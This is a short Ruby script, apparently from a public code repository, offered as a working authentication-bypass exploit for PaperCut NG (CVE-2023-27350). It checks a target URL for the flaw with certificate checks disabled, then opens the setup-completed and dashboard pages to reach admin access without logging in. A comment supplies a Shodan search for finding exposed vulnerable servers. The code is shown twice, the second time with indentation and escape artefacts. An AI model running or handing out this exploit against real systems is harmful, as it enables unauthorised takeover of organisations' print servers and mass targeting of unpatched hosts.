komodoooo/pcl.rb

## pcl.rb
require 'http'
require 'openssl'

puts """
CVE-2023-27350
PaperCut NG 22.0.5 Build 63914 auth bypass exploit
By komodo\n
"""

=begin

Shodan dork to search vulnerable targets:

http.title:"PaperCut Login" http.html:"papercut" http.html:"print"
http.favicon.hash:-626462482

=end

def main(url)
    url.delete_suffix!("/") unless url[-1..-1] != "/"
    @ctx = OpenSSL::SSL::SSLContext.new()
    @ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
    pa=["/app?service=page/SetupCompleted",
        "/app?service=page/Dashboard"]
    if HTTP.get(url+pa[0], :ssl_context=>@ctx).status == 302
        puts "\nNot vulnerable :(\n\n"
    else
        pa.each do |i|
            sus=url+i      #yeah, "portability"...
            system("xdg-open %s || start %s || open %s"%[sus,sus,sus])
            sleep(2)
        end
    end
end

begin
    print("Base URL: ")
    main(gets.chomp)
rescue => err
    abort(err.to_s)
end
	require 'http'
	require 'openssl'

	puts """
	CVE-2023-27350
	PaperCut NG 22.0.5 Build 63914 auth bypass exploit
	By komodo\n
	"""

	=begin

	Shodan dork to search vulnerable targets:

	http.title:"PaperCut Login" http.html:"papercut" http.html:"print"
	http.favicon.hash:-626462482

	=end

	def main(url)
	url.delete_suffix!("/") unless url[-1..-1] != "/"
	@ctx = OpenSSL::SSL::SSLContext.new()
	@ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
	pa=["/app?service=page/SetupCompleted",
	"/app?service=page/Dashboard"]
	if HTTP.get(url+pa[0], :ssl_context=>@ctx).status == 302
	puts "\nNot vulnerable :(\n\n"
	else
	pa.each do \|i\|
	sus=url+i #yeah, "portability"...
	system("xdg-open %s \|\| start %s \|\| open %s"%[sus,sus,sus])
	sleep(2)
	end
	end
	end

	begin
	print("Base URL: ")
	main(gets.chomp)
	rescue => err
	abort(err.to_s)
	end